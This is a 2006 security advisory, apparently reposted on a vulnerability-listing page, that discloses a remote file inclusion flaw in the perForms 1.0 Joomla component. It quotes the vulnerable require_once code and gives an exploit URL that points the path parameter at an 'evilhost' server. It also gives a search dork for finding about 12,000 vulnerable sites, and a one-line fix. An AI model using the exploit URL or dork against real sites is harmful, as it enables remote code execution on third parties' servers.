Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[SA21038] CzarNews "tpath" File Inclusion Vulnerability

SubberZ[Lite] - Remote File Include

flatnuke <= 2.5.7 arbitrary php file upload

Flipper Poll <= 1.1.0 Remote File Inclusion Vulnerability

From:	endeneu_(at)_linuxmail.com <endeneu_(at)_linuxmail.com>
Date:	14.07.2006
Subject:	perForms <= 1.0 ([mosConfig_absolute_path]) Remote File Inclusion

---------------------------------------------------------------------------
perForms  <= 1.0 ([mosConfig_absolute_path]) Remote File Inclusion
---------------------------------------------------------------------------

Remote : Yes
Critical Level : High

Vuln founded in a log file: lazy 0day!!! :D



Description:
~~~~~~~~~~~~

Application :  perForms Joomla Component
Version : latest version [1.0]
URL : http://forge.joomla.org/sf/projects/performs

Variable $mosConfig_absolute_path not sanitized: xpl works with register_globals=on

in /components/com_performs/com_performs/performs.php on lines 6-10

require_once( $mosConfig_absolute_path.
"/administrator/components/com_performs/lib/lib_template.php"
);
require_once( $mosConfig_absolute_path.
"/administrator/components/com_performs/lib/lib_valid.php" );
require_once( $mosConfig_absolute_path.
"/administrator/components/com_performs/lib/lib_phpForm.php" );
require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/myLib.
php" );
require_once($mosConfig_absolute_path.
"/administrator/components/com_performs/class.performs.php");


Exploit:
~~~~~~~~

dork: inurl:"com_performs" -> founds ~12.000 sites (!)

http://www.vuln.com/components/com_performs/performs.php?mosConfig_absolute_path=
http://evilhost


Fix
~~~~

Add before code:

defined('_VALID_MOS') or die('Direct access to this location is not allowed.');


Thx
~~~~

Who works for better code and better life!


---------------------------------------------------------------------------------
-------------------